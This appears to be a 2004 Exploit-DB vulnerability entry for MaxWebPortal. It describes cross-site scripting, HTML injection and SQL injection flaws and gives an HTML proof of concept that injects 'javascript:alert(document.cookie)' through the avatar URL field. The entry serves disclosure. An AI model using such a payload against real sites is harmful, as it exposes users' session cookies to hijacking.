MaxWebPortal 1.3x Personal Message SendTo Parameter XSS

ID EDB-ID:23677
Type exploitdb
Reporter Manuel Lopez
Modified 2004-02-10T00:00:00


MaxWebPortal 1.3x Personal Message SendTo Parameter XSS. CVE-2004-0271. Webapps exploit for asp platform

It has been reported that MaxWebPortal may be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied input. The specific issues include cross-site scripting, HTML injection and SQL injection.
MaxWebPortal versions prior to 1.32 have been reported to be prone to these issues.

<select name="Avatar_URL" size="4" onChange ="if (CheckNav(3.0,4.0)) URL.src=form.Avatar_URL.options[form.Avatar_URL.options.selectedIndex].value;">
<option value="javascript:alert(document.cookie)">POC-Avatar</option></select>